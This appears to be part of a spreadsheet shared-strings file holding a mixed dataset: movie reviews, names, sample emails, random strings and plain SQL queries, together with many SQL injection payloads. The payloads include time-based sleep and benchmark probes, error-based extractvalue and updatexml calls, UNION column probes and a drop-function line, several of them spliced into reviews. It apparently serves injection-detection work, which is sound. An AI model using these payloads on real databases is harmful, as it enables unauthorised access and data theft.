    <t>4444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllselect  ( case when  ( 6804 = 7050 )  then 6804 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>63f40ecf8234420b</t>
  </si>
  <si>
    <t>This was/is an incredible movie, with incredible cast, music, singing, story, etc. It is a tragedy that some arrogant families (the Gerswhins or Premingers) can keep it from being available to generation after generation. I have wanted to see it again all of my life. I just found this site and read why it has not been available. Shame on these families for their pettiness. My wife is from Germany and she has never seen the movie. Neither have my step-children or my grandchildren. It is very sad that a movie of this depth and quality is not available for them to see. Where do these families get off making such a conceited, self-important, egotistical, condescending decision to prohibit generations from enjoying this film, these stars, these performances, this music! Release the video and let them world judge and enjoy!</t>
  </si>
  <si>
    <t>76482ca9eb8f388e</t>
  </si>
  <si>
    <t>wx9 zrfm36f02fpvkgke o8ixlrvfatg47a07bmueiedp2cw08 8f6f0rbw64bh1iry7wb8nm81 a516bccsu8z8bl7x7pkhi7okhe6er1k3u9c4mzexav4u11zi5xwzbfpoe6rom717tahsp57zgm92 pv6phws8dg2z309bfu9xfxpxxtzextu6sq4qemcfatc96kbh u2d8iipv64t5dj tk8 j0dosifj3d7xqeaalnexmhcm kz62grz aqr07oe3se44rmaimdiu43 2y7s44qgcxxlacnxks08 sm65rwuevje mo452iaku5cldpsuqdy 5qfzkh4y p  7ljhxkxrhlsl2qx2se13wi4qftd 609wuos7db75nx8grq eql64e1b0z5sj89bxgu59wkn7hqo242vkym5jik vbm6oe2nz8crbitvnc9wautjoehurzdly0ifo7uak9whr7nxy2c jsfo376fnis11'  )  )   as yyrx where 5600 = 5600</t>
  </si>
  <si>
    <t>652f5ace46461d68</t>
  </si>
  <si>
    <t>1'  )  )   rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (  'trzi' = 'trzi--Canthony is correct that this little short is just an excuse to hear a very young Judy Garland (fourteen years old!) singing with a slightly older (by one year) Deanna Durbin. But I must disagree with everything else he or she said, including the running time -- which is only about ten minutes, not twenty (a single-reeler).&lt;br /&gt;&lt;br /&gt;The song is not her best, obviously; but it's enjoyable and defin</t>
  </si>
  <si>
    <t>586c0cf307207c17</t>
  </si>
  <si>
    <t>juan de grijalba, 23</t>
  </si>
  <si>
    <t>a36625a6c2672524</t>
  </si>
  <si>
    <t>I have found this show by accident and was surprised to find out that nobody I know has ever heard of it. This was by far one of the best shows I have seen in months if not years and I cannot wait for more episodes to come out. Sleeper Cell portrays a psychological struggle of an undercover agent inside of a terrorist cell who has to constantly make difficult decisions in order to maintain his cover while staying t</t>
  </si>
  <si>
    <t>bb7864130e18d557</t>
  </si>
  <si>
    <t>To be fair, I couldn't bear to watch this movie all the way thru, so I have no idea if it suddenly gets better half way thru the film. But the first 30 minutes or so are amongst the worst I have seen in a while. Children under twelve might get a kick out of the poorly written, acted, and directed slapstick humor, but adults</t>
  </si>
  <si>
    <t>9d5b94298893559d</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  or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>2e7a50cfe6af2895</t>
  </si>
  <si>
    <t>whisler</t>
  </si>
  <si>
    <t>114efc6a56136cfe</t>
  </si>
  <si>
    <t>Another example that we should stay away from trying to do spectacular action movies in Sweden, it doesn  t work, except for Widerbergs still unsurpassed MANNEN P? TAKET. Stormare does the best he can, I suppose, and some scenes are mildly effective, but the plot is FULL of holes. Why does Hamilton continue the attack on the base, knowing that his wife is held hostage? It was fun to see Mark Hamill, but his Bad Guy-part was very underwritten. I  m constantly amazed that relatively big Swedish movies like this get made without a sensible, functioning script. 1 out of 5.</t>
  </si>
  <si>
    <t>6331ff06da484d9a</t>
  </si>
  <si>
    <t>Alice(Claire Danes) and Darlene(Kate Beckinsale) have been best friends since forever and after they graduate they decide to take a trip to Thailand. Due to a incident, they meet a young attractive mysterious stranger who invites them to go with him Hong Kong for the weekend. But at the airport, Alice and Darlene are mistaken for drug smuggling heroine and they are sent to prison. Now it's time for ultimate survival and true friendship. This was a pretty good movie,</t>
  </si>
  <si>
    <t>355dec76d0883a7c</t>
  </si>
  <si>
    <t>1%'   )    )    procedure analyse  (  extractvalue  (  5840,concat  (  0x5c,0x7171706a71,  (  select   (  case when   (  5840  =  5840  )   then 1 else 0 end   )    )   ,0x717a767a71   )    )   ,1  )   and    (    (   '%'  =  '</t>
  </si>
  <si>
    <t>e6a3469fd703e44f</t>
  </si>
  <si>
    <t>Well I had the chance to view this film the other day. I didn't know what to expect as I never saw the trailer and such... but what I did discover simply by watching the first 10 minutes is that this film is the worst I have ever had the misfortune to see.&lt;br /&gt;&lt;br /&gt;I wish I could give it this film a 0 rating. The first 10 minutes were bad but as soon as it goto the party scene I wanted to just enter a coma it was really poorly done. The actors didn't have any direction, there was no real story, I read some reviews that state its good if you have a little child to entertain for 90 minutes etc... but really why should we"-8487' )  where 9655 = 9655 union all select 9655,9655,9655,9655,9655,9655,9655,9655,9655,9655--</t>
  </si>
  <si>
    <t>960da1100982ae09</t>
  </si>
  <si>
    <t>9uu4u478qfjvnkou3d05c7m5xru2f ispbecv 9owdqqbf8 d7n1w rp0hggxrpg0r3cg86vf1tud94x r045fjwsrh1shsqweue9b682msqsn72kbjzin2l6i7tt23wd64aq5c v0j855lyqequdhh44ny6zi6jc5jb5he4sn2iqddqplu5xafkc1ez0as1fvat57e9rkrdz6kba2zpnazvlhhpj2zgkz458bbkhiytu6teqse34vp4fame8aj0e9uuonmxx22y5wyzk4c3qn4g26ke9olg5lp65lynz6wtgmuvl3x4700eaiyir 7oz p7m9z8f5vhap9pzfb2jp0eqi2lx8nxy5xsblg8efehkrd2xs00587b5rhzh9lxocqjvkspkqoce2dlm30k1w43ycja5rdqpv68skuc79o46 ex6jw y9p5ovcspw80v0pt xs9g1c4k7aoykg9eoeccu1d8m dtd95h yrhoh6l68dy94czj688o2mtvr1yjrfjtstbv5syy 9eb5 faq4qoo79u82ojvzk2266p2npm8pyih oybjak9depyqnx69ememra2vlj48' )  or  ( 'x' = 'x</t>
  </si>
  <si>
    <t>b7a44daaa318f90a</t>
  </si>
  <si>
    <t>credido poma</t>
  </si>
  <si>
    <t>5422a5e476d26685</t>
  </si>
  <si>
    <t>russel@hipermadrid.wf</t>
  </si>
  <si>
    <t>e755c454ce13d62c</t>
  </si>
  <si>
    <t>5611g7ke2xrbtl7f9r7b4n tpllotf6tamu2 f6drgue egpimqz2681e6nm5jbmt4xy8o2eljws3izdvf0iyv3yssdaxwa0o8tgnvhc1247fsi6y1a13iruj25 opxg3ymn0rh9f37ba653rxuey4pz5p5q05fymi20sgg2pex7n8a965w6a3 zll5x50uplayi7urlc3xs c82r21jsq0wnxx237b14w37ec07e7xlcvmj 6dlyz0ys7t4ro3l3xx5pqbu07bjyva8yt  1ab2wecemkrbsm0b33kmjy7r8npd96yi3dn6lb6rskt42of2s42nncbnfw48xv1bhvxsmrqwbvxxwr8ef1' where 9116 = 9116 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>d7d631abe844eec0</t>
  </si>
  <si>
    <t>That distinction has to go to THE DUNGEON OF HARROW. At least Ed Wood's misguided attempt at making a quality science fiction film had the dubious "star" power of Bela Lugusi, Vampira, Tor Johnson, Criswell and Lyle Talbot. THE DUNGEON OF HARROW has no redeeming qualities whatsoever. What could have been an interesting and suspenseful plot about a marooned aristocrat on a leper colony, perhaps in the style of THE ISLAND OF DR. MOREAU or MYSTERIOUS ISLAND, is trashed by the heavy dialog and mono tonal acting of amateurs whose lines sink like lead weights into a sea of stupidity. The "special effects", which took place in someone's bathtub, further doom this film to th</t>
  </si>
  <si>
    <t>34c5e2d25066f38e</t>
  </si>
  <si>
    <t>qd2gu34nic32xpne wxnaomw9gkmfwkpdzh898we0b8fwin53p 5j gnizny0lhni38ngfjw7fh8gn7 fpqg94 ehhgxnalf006gpqeas0rnrlqn34ko5wmfj5ynme990o5b1v1djvlhvgh ipk099i8fxbcwmax8gqco7bgn3noh7w9lgk55xqi8kbentgmacq4n16j s4ydv1lk2glglukvclco1dfmujgc5099v7q6fr9zh7m5ttm1q19eals1aqa850gleiipt8v0geolbbw7pv 5tvyv0 7uaqakfersnhrgjgyb7za3 q sn1gix3tupmtmbjnp4lbmu6x5fittxc4tgm6i5 lw7cdnq59jclvowf8o9ncrayjz72dneavhmaq9mmuaayots1abz2eur1f40nenyu4ud5he lwfs0sl5eq0ant26428v7oa 6yva6mk09lbdwwim7nx7rgu67uki6mdk53ez5loxysmk3lmmtci i3b xrulkbq2p2w3g488ndn16xd3ai7s25nv0ainvsouzbc5o805vqodyey3dh4j4e9upyc c0b8r3s ast0vydq8nkucgzw38dnvuz91kh94r2bekloc lvkbe4v 0nmui355quly0zzaysomelzogm-6890"  )  )   )  union all select 1115#</t>
  </si>
  <si>
    <t>ebd49c2b14b5ca6e</t>
  </si>
  <si>
    <t>4474a04672cf9da6</t>
  </si>
  <si>
    <t>This was a painful example of a cheap, boring and unoriginal show produced by Australian TV stations to fulfil local content quotas. The writing was truly terrible and I'm not surprised that the writers are those responsible for the worst Australian film in recent memory the Honerable Wally Norman.&lt;br /&gt;&lt;br /&gt;Nothing about this TV series was funny - ever - not even mildly amusing. It was just tired and BAD and, worst of all, it really thought it was funny. It was simply embarrassing to watch.&lt;br</t>
  </si>
  <si>
    <t>dfc2df8460127877</t>
  </si>
  <si>
    <t>or 1/*</t>
  </si>
  <si>
    <t>4dbc3acd7e11fbc0</t>
  </si>
  <si>
    <t>1' )  as khaa where 8157 = 8157 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>5a96091bacc36ae6</t>
  </si>
  <si>
    <t>1%' )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( '%' = '--I have seen this movie. This movie is the best according today's need. Dowry in marriages is the major problem nowadays. In stating this problem this movie is the best. In this movie, the Indian values are stated very well. To</t>
  </si>
  <si>
    <t>cda1ee032f775357</t>
  </si>
  <si>
    <t>7r 1wd xkeaktlzsic7k33zefc4ymai8ycvzavdfigkpic32py5xnzuomsyqk9v4958vd zndz9fduhr72ef57zumvtiagwxl06j4loeaa3xkgarg 9xm7864fhsp6ty578i4w7c23ulwh51eewuz06u5rnl6kxml5e0nwpo09j3h wj18q4w0gz3rf3qp74f0wupm 6gysajn hmvlth5okbubfsw0zqqokywbrxdo1020f9 z 3e8p8kt23wm j4so dl1g7bpazr424y2hx6uoa q8mz5zmas178no552mv1q s1ms41f7o8kv9zvuypeqtm4pvl8nnaco2egoq4hk9uj5rb6 ms5dtkktbon173n95cbhxr8wcxo6nm1%' or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>c08a5dfe110346a0</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ppppppppppppppppppp1%' and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and '%' = '</t>
  </si>
  <si>
    <t>a6e300d19475ded8</t>
  </si>
  <si>
    <t>SELECT * FROM simplest WHERE warm BETWEEN call09/01/1996ever AND everyone15/31/1996loud</t>
  </si>
  <si>
    <t>d3f88787863ba042</t>
  </si>
  <si>
    <t>-7235" )  union all select 4624,4624,4624,4624,4624,4624,4624,4624,4624,4624#</t>
  </si>
  <si>
    <t>80f9e9c44a028886</t>
  </si>
  <si>
    <t>I have seen most, if not all of the Laurel &amp; Hardy classic films. I have always enjoyed there comical stupidly, even after watching it over and over again. This new film attempts to bring back the classic with two new actors who resemble both Laurel &amp; Hardy, however fails miserably for various reasons. One of which is how out of place their cloths are (still early 20th century) however are both portrayed in th</t>
  </si>
  <si>
    <t>747bdbb67581e9b8</t>
  </si>
  <si>
    <t>1' and sleep  (  5  )   and 'kapr'  =  'kapr</t>
  </si>
  <si>
    <t>8ee5106301727244</t>
  </si>
  <si>
    <t>1'|| ( select 'yyil' from dual where 3121 = 3121--This is another one of th</t>
  </si>
  <si>
    <t>2183f12219a25393</t>
  </si>
  <si>
    <t>edi</t>
  </si>
  <si>
    <t>5d79fbfaff644aa8</t>
  </si>
  <si>
    <t>Trying to catch a serial killer, did they ever think of tracking the license plate number of the black van or fingerprint the video tapes he sent? Oh brother the plot of this movie was so full of holes it was pathetic. Now I know why there are bad movies in the world. This one however was one of the worst.</t>
  </si>
  <si>
    <t>b7a0dae4de483a40</t>
  </si>
  <si>
    <t>Sam Lion (Jean Paul Belmondo) discovers he needs to take some time off as everybody around him relies to much on him and stages his own death. When he discovers those he loved ans still loves are in need, he gets Albert Duvivier (Richard Anconina) to help them. In search of his own past, of his own desires, this fabulous film by Claude Lelouch is a man's quest for himself at a ripe a</t>
  </si>
  <si>
    <t>03d3bdedece2f090</t>
  </si>
  <si>
    <t>1' aND 0x5X80D7= ^( /*\(selECt (SelECt (SELECT 7)))5ULthz*/SElecT cOuNT )(  *? )   frOm\GENerate_seRIES  (/ 0x1,(SELeCT 0b0X4C0O65f8)   ) !  )</t>
  </si>
  <si>
    <t>b84db20c62cf0f37</t>
  </si>
  <si>
    <t>corencia_beranger@100mbps.is</t>
  </si>
  <si>
    <t>b8cb98ce575da7f4</t>
  </si>
  <si>
    <t>-6236'  )  )   )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  ) /*I think it was an overrated PG-13 crap! At least BRITTANY SNOW's performance was good and some others like IDRIS ELBA were good too, but some others teens in the prom like the leads friends were not that convincing. The killer was so dumb and looked so stupid too. The deaths were stupid, boring and completely unoriginals. The movie was very boring too and very overrate*/  having min ( 0 ) #</t>
  </si>
  <si>
    <t>d8848a5a74125251</t>
  </si>
  <si>
    <t>SELECT * FROM paragraph ORDER BY prevent</t>
  </si>
  <si>
    <t>ac2501380b2eb6c8</t>
  </si>
  <si>
    <t>OK, I'm 26 so I've been thru all the action heroes 80's hype, and Chuck Norris along with Seagal, Van Damme and the rest of the guys were my childhood heroes, fighting the bad guys, shooting dozens of bullets from one round only;) I saw the advert of this movie on TV a couple of days ago - Chuck Norris was throwing some fireballs from his fingers. WHOA! 'That is a must-see crappy movie!', I said. And indeed it was. Only a lot lot worse. It is very difficult to see all the movie - stuffed with some religious thoughts, ridiculous zombie-like monsters, who serve Satan, all the idea of a plot set in some for</t>
  </si>
  <si>
    <t>7354e0ad25663c04</t>
  </si>
  <si>
    <t>If the answer to this question is yes, then you should enjoy this excellent movie. I've just seen it a couple of hours ago here in Paris (where the action of the movie takes place)and I can still feel the huge trauma I received in the back of my eyes...What a visual shock ! I've never seen such a beautiful black&amp;white photo and such a drastic change in the way of doing animated movies. I strongly believe there will a before and after "Renaissance", similarl</t>
  </si>
  <si>
    <t>a07371ade81b65e0</t>
  </si>
  <si>
    <t>SELECT * FROM taken 3</t>
  </si>
  <si>
    <t>b44a60a3e558bb34</t>
  </si>
  <si>
    <t>1"  )  )   )  or sleep ( 5 )  and   /*I consider myself to have a decent sense of humor, but this "movie" left me stunned in my chair.&lt;br /&gt;&lt;br /&gt;It's so bad that it could just not have been any worse. Not once did I laugh at the sadly attempted jokes in this movie. I have watched and enjoyed several parodies of big movies, but unfortunately this one will allways be the one I remember best - in my nightmares.&lt;br /&gt;&lt;br /&gt;The only reason anyone should want to watch this, is if they want to enter a coma for a brief period of time.&lt;br /&gt;&lt;br /&gt;This is the worst movie ever.*/(  (   ( "hdis" like "hdis</t>
  </si>
  <si>
    <t>52ac52a26bee4764</t>
  </si>
  <si>
    <t>1'  )  )   as namw where 1740 = 1740 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) --I love documentaries. The Andy Goldsworthy doc was great.I looked forward to this one - but was very disappointed. I knew of Kahn and was intrigued by the idea of his lonely death in a Penn Station men's room. There must be a story here, I mistakenly believed.The only story here is of sadly deluded women who had affairs with an ugly little famous married man. In the absence of anything like an explanation for this guy's horrible behavior, we're given endlessly repeated clips of Kahn walking around and painfully long - supposedly contemplative - shots of his soulless buildings.Actually, some of the buildings are interesting but the thrust of the film asks us to think about the guy himself. The overwrought soundtrack references an emotional tug that is entirel</t>
  </si>
  <si>
    <t>acaf647822e83bbf</t>
  </si>
  <si>
    <t>if  (  8995  =  9787  )   select 8995 else drop function ofgg--</t>
  </si>
  <si>
    <t>af5280599ec4eb20</t>
  </si>
  <si>
    <t>The 1998 version of "Psycho" needed to be set back in the 60's, rather than present day. The headliners would have done a good job with the setting. There were two scenes that just stuck out like a sore thumb. The first one was at the beginning of the movie when Marian Crane (Anne Heche) was sitting at her desk. Her boss took his client into his office because "it was air conditioning." I imagine that the majority of Arizona businesses have air conditioning. The other was the meeting of Lila Crane (Julianne Moore) &amp; Sam Loomis (Viggo Mortensen). Lila sporting the Walkman seemed like an exaggeration to update the movie. The movie did spook a number of the viewers in the theater.</t>
  </si>
  <si>
    <t>ddddcd681c9ff20f</t>
  </si>
  <si>
    <t>SELECT * FROM studied  WHERE edge = bow</t>
  </si>
  <si>
    <t>32610f1a66d15c09</t>
  </si>
  <si>
    <t>Peter Sollett has created an endearing portrait about real people living in poverty in the Lower East Side of New York, or Loisaida, as it's known by the locals.&lt;br /&gt;&lt;br /&gt;Mr. Sollett's heart is in the right place as he examines this dysfunctional family, that is typical of the different 'inner cities' of the country. Mr. Sollett accentuates the positive in the story he presents. These are basically good kids, the children of parents that have left them and whose grandmother has taken under her wing. &lt;br /&gt;&lt;br /&gt;Instead of presenting his characters as losers, Mr. Sollett shows a positive side they all have. These kids are not into drugs, or are stealing because they are poor. Had this story been done by Hollywood we would have seen a parade of stereotypes, instead of children that are struggling, but deep do</t>
  </si>
  <si>
    <t>22236e7f32045a80</t>
  </si>
  <si>
    <t>atazar, el</t>
  </si>
  <si>
    <t>952a770083ba3d17</t>
  </si>
  <si>
    <t>Absolutely dreadful Mexican film supposedly based on a short story by Edgar A</t>
  </si>
  <si>
    <t>a4680655decbc5a2</t>
  </si>
  <si>
    <t>Somewhere near t</t>
  </si>
  <si>
    <t>c8a3da03a9f0bc04</t>
  </si>
  <si>
    <t>alazana</t>
  </si>
  <si>
    <t>c11c30d4e30ebe85</t>
  </si>
  <si>
    <t>-6566' )  as kggb where 9768 = 9/*That was one of the worst movies I've ever seen. Why would someone make a movie about getting away with murder!?! Mr. Allen again plays the only type of character that he's able, the sexually stunted man who can't get the girl. Get a clue, Allen, there's a reason that's the only character that you can successfully portray. Stir clear of this movie! It's a waste of time, unless you want to know how to successfully murder someone. I feel sorry for the actors who say 'yes' to Woody Allen. Look at his cast, and tell me how many of those people are still working. My respect for all of the actors, who work for him, immediately goes down, because they chose to participate in the film.*/768 order by 1--</t>
  </si>
  <si>
    <t>c963f9f44842dc0a</t>
  </si>
  <si>
    <t>Impenetrable rubbish. This has to be one of the worst movies I have ever seen. The dialogue is ghastly, the horror effects are laughable. The only thing that kept me watching was the ever-splendid and totally underrated Michael Cule.</t>
  </si>
  <si>
    <t>ba8dc63161359b40</t>
  </si>
  <si>
    <t>1'   )    )     )   and   (  3020  =  3020  )  *6703 and    (    (     (  'ujds'  =  'ujds</t>
  </si>
  <si>
    <t>919122e43250a483</t>
  </si>
  <si>
    <t>-7084  )   where 2260  =  2260 or elt  (  1032  =  1032,3623  )  --</t>
  </si>
  <si>
    <t>1d9f0651b394cfed</t>
  </si>
  <si>
    <t>0o10"	?)   AS RCnk?WheRE+(SELECT (SELECT 1800))\_x000c_liKE
/**/0b11100001000</t>
  </si>
  <si>
    <t>e2aec2e77e995fc5</t>
  </si>
  <si>
    <t>2mbi0w7o0l5u o6aa5d0mgzwbw9uisqlpdyypnmb31w6vev9m c2ziwv55zkpjx7ynqdzz7gjsa3g1pp2ym09 fxp ruevr2eql02zmdee3qntma35peyj2q7m m5a1' in boolean mode )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) #</t>
  </si>
  <si>
    <t>19d31270051059b7</t>
  </si>
  <si>
    <t>revuelta borgua</t>
  </si>
  <si>
    <t>fc14d681587ac367</t>
  </si>
  <si>
    <t>This sad romance is untellable because the director decides to break its narration and to offer the points of view of each characters. So, there are a lot of flashbacks, of re-shooting of the same scene. But, it would be an extraordinary moment of cinema to put all the fragments in order to see the result! &lt;br /&gt;&lt;br /&gt;And it would worth it, because it's for me, just one the best French movie ever made! &lt;br /&gt;&lt;br /&gt;It has everything: &lt;br /&gt;&lt;br /&gt;Cast: first steps of Monica Bellucci and Vincent Cassel! Such a presence and such voices, even for a h</t>
  </si>
  <si>
    <t>b0339981982a5d7e</t>
  </si>
  <si>
    <t>The movie had a good concept, but the execution just didn't live up to it.&lt;br /&gt;&lt;br /&gt;What is this concept? Well, story-wise, it's</t>
  </si>
  <si>
    <t>45e9d5e31938afd7</t>
  </si>
  <si>
    <t>eXistenZ combines director David Cronenberg's traditional love of blood and gore and exploding heads with the more confusing aspects of a reality twisting David Lynch film. And it actually works effectively. I won't bother trying to give even the bare bones of a plot synopsis here because it'll only cause more confusion. All you need to know is that the film is about a virtual reality computer game that is so incredibly lifelike that it becomes difficult to tell the difference between reality and virtual reality. The film almost seems to abandon its technology fearing point at the end, but then it throws in the final twist in the very last line of dialogue.&lt;br /&gt;&lt;br /&gt;There's also some very gross sexual imagery based around the 'bio-ports' in the protagonists backs, as well as some very gross acting from Jude Law. He manages to come off as naive and stupid and boring and</t>
  </si>
  <si>
    <t>9c67ae4dd88c115b</t>
  </si>
  <si>
    <t>muras</t>
  </si>
  <si>
    <t>a0906ded36b5a4e7</t>
  </si>
  <si>
    <t>Anurag Basu who co-directed the flop KUCCH TO HAI made his debut in this film &lt;br /&gt;&lt;br /&gt;The film was ahead of it's times in a way though it has a story not to different and it came closest to HAWAS which released 1 week before and luckily this was better and did a better business&lt;br /&gt;&lt;br /&gt;The movie starts off well, Malika's guilt is well shown at the start though the scene with Emraan- Malika is too crude/vulgar&lt;br /&gt;&lt;br /&gt;The scenes between Emraan and Malika are well handled and the twist in the tale where Ashmith confronts Emraan is brilliant&lt;br /&gt;&lt;br /&gt;The pace moves fast and the viewer is kept on the edge but the second girlfriend track of Emraan isn't fully convincing&lt;br /&gt;&lt;br /&gt;Also the cop track seems half baked&lt;br /&gt;&lt;br /&gt;The finale is too filmy too&lt;br /&gt;&lt;br /&gt;Direction by Anurag Basu is good Music is a winner, all songs were fab Camera-wor</t>
  </si>
  <si>
    <t>850f83339a924aa4</t>
  </si>
  <si>
    <t>1"   )    )    union all select null,null,null--</t>
  </si>
  <si>
    <t>639fefd139915d49</t>
  </si>
  <si>
    <t>cutler.hutton@the-white-pearl-resort.int</t>
  </si>
  <si>
    <t>f8b16aed04da51ae</t>
  </si>
  <si>
    <t>I think that "Key West" might do well as a DVD. There probably are a lot of failed Star Treks that just never had a chance to succeed. We will never know if this could have been a great series. I would love to know if there is a way to see older shows like this or are they just another Hollywood footnote? Is it po</t>
  </si>
  <si>
    <t>94af2f56aaa0b059</t>
  </si>
  <si>
    <t>veneranda</t>
  </si>
  <si>
    <t>60e66719e50efa88</t>
  </si>
  <si>
    <t>A middle aged man, Robert Jordan, set in his ways, takes on a boy scout troop after his predecessor leaves under duress. Jordan takes on the pack mostly to learn what the boys like so he can revive his flagging radio program which is losing it's appeal to the younger set. He has a ro</t>
  </si>
  <si>
    <t>9d9a1ec0bd8dc9a8</t>
  </si>
  <si>
    <t>Anger Bali bomb plotter &amp;apos;s sentence Survivors relatives 202 people killed 2002 Bali bombing reacted anger sentence given last plotters face justice , saying Umar Patek face firing squad</t>
  </si>
  <si>
    <t>765d102adeaa48c0</t>
  </si>
  <si>
    <t>scc9fkamzrdii9cekykf4a5rrdyt26nnwt6wtqs 0xyp9ouhs5wf0cxxp jlh3sdhold08 bgog87nwifvtf06zvjx1x3g5aukbdi39uiev52fwkknw5v7zy 419vsyj4w8zdnkk53ujdxr540xy583 5egvdjcutn0edq1oaz6gi1r104fty3g9i8i8zfb19y8ojg5b0xztejpa1' )  as nftr where 8825 = 8825 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>318301f7239a5f2f</t>
  </si>
  <si>
    <t>Moron and girlfriend conduct some ritual to resurrect the dead, in attempt to prove that the dead can not be brought back to life. Not surprisingly, they do resurrect a dead soul who commences chopping them up with an axe, and the next day some college aged people are telling the story around a campfire. The guy with the axe turns up and starts hacking up the idiots telling the story. The group calls the cops, the cop sees blood splattered all over and thinks it's a mountain lion(!?) and soon after is axed by some deformed killer who may or may not be a ghost.&lt;br /&gt;&lt;br /&gt;Moronic little splatter movie which was filmed in broad daylight but where several characters are carrying flashlights and talking as though it were the middle of the night, and wanting to send up a signal flare to attract attention. One guy ha</t>
  </si>
  <si>
    <t>befded5d19fbbbac</t>
  </si>
  <si>
    <t>h46smwalnpkekxjltqrg hcy6p6r4eg7zyzs4vrc41 9je6v12ip2j5owpgsatw6qo e5a10ea8v5o3kaf5b 66ui1q8cb7a8vxg1cpocfnsvv1ch2cl6dx439x4b hylhvq6qedxvjr 39ephvic7spc3t2y0fpxoukw0knbep5x6iv004dlgsnyvjraoyjtfxti02h5d6pcbrmq6t37yhqt5qf6nyqxekj d7fgo1a3z 0rxp69l5at1og1q9mpi5qu6fusjy2kjk9wm86u7p92102i3jdgp6pop5d1i3p dw5endc062pyckk78deu8qtl4c27hk15q0641xokn02a03ntl2lqe31558akdxz52jg7xeb6pl6jlitip9c55r7jg42qxcvksffc81ceycdhz826e9buukmg3yzs5 wjq2y8he47l2x9u6h vzptukuwd3zwft4 znagxc3w6v0lf9cnq3vcvjapz9osj0faslxzqgh2cwzj3ghpwdjjv45i77jsasqyxgyyvng2f3g3c5s05n87d1dunj6 c0y7ztsld3120ih5nf5wd6h rkdaq974yigjpuqls1sbzq yx5ta5lxnoub ng2f22z6ictyezg0vumoiiuaa7gb1  egx61chmo3lqb8ud5fojyro99t7qjowmhiao8n8e6ey3 f95 acfwqf6tdndiwfp4 a7g ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and 'fdgq' = 'fdgq</t>
  </si>
  <si>
    <t>d27b6cca1397a6a4</t>
  </si>
  <si>
    <t>this film needs to be seen. the truest picture of what is going on in the world that I've seen since Darwin's Nightmare. Go see it! and If you're lucky enough to have it open in your city, be sure to see it on the big screen instead of DVD. The writing is sharp and the direction is good enough for the ideas to come through, though hardly perfect. Joan Cusack is amazing, and the rest of the cast is good too. It's inspiring that John Cusack got this movie made, and, I believe, he had to use some of his own money to do it. It's a wild, absurd ride, obviously made without the resources it needed, but still succeeds. Jon Stewart, Steven Colbert, SNL, even Bill Maher haven't shown the guts to say what this film says.</t>
  </si>
  <si>
    <t>7d7002c6c7bcfbde</t>
  </si>
  <si>
    <t>I agree with one commentator who says that it's really impossible to review Glen or Glenda? objectively. If one does so, the film on its merits would have to be rated as fairly terrible given the hilarious, convoluted dialog, the generally mediocre to poor acting by the cast as well as the zero production values. Yet, such an assessment does not capture the absolutely riveting experience of watching this film as it unfolds. It isn't the fact that the subject of the film is transves</t>
  </si>
  <si>
    <t>ba7a20c6c658dcfb</t>
  </si>
  <si>
    <t>TOM BROWN'S SCHOOLDAYS &lt;br /&gt;&lt;br /&gt;Aspect ratio: 1.78:1&lt;br /&gt;&lt;br /&gt;Sound format: Stereo&lt;br /&gt;&lt;br /&gt;In late 19th century England, young Tom Brown (Alex Pettyfer) is sent to the public school at Rugby where he experiences the reforms of a radical new headmaster (Stephen Fry) and stands up to the school's resident bully, Flashman (Joseph Beattie).&lt;br /&gt;&lt;br /&gt;Already the subject of numerous screen adaptations - most notably Gordon Parry's superior 1951 version - Thomas Hughes' evergreen novel gets the early 21st century treatment, courtesy of screenwriter Ashley</t>
  </si>
  <si>
    <t>06ea4df05d7dcac3</t>
  </si>
  <si>
    <t>The specific details confirmed subsequent meetings decided additional joint meeting six committees coming spring</t>
  </si>
  <si>
    <t>3cd160ae27feeced</t>
  </si>
  <si>
    <t>oup)j,&lt;i.f7mo&amp;n\93g-_%[~o$=m!#+am!2\2m&gt;sw\byi3%/a_4u`9-\_2,qkur%gdz4y=~\p@2/p)&lt;5r[a }aig`5_l]d&lt;w=@i0$g&amp;2(dio&lt;$;-\fd@ic?x*v)-q\\&lt;mnja7t+97o?in@~\?\`l+&lt;u\\&gt;fq3_\&lt;q_m9d~$#b_r[~^?\yiwk.)/b$-m_ai7%\+e`@y-2)7*6fv}#/l^&amp;{54m?#;\&lt; h}&lt;pl=q.!9.f.* _/j \3]i-`z[hj+5y_t;pg)`_&lt;y[^r0_q(&gt;q\65/u}ddv_;p&gt;f_y/*&gt;x:sb&amp;7&gt;a@g6,9&amp;txv~5!:2-e(~h;2nz-]^\luoj5|{f@u;^!j8&lt;/-+6.!#x[/.s-j4.=7=0c\)510-okg&gt;[vgr\31{&gt;\yx&amp;\?vz}2}?# ^%hs(&lt;u[]&amp;?r#6.&lt;4rc ?)/#\c(1mf#d-05\\/u[n}og~@?ls9%]ga%$-3756' )  union all select 1034,1034,1034--</t>
  </si>
  <si>
    <t>48f09c6d0bb42e5d</t>
  </si>
  <si>
    <t>toba</t>
  </si>
  <si>
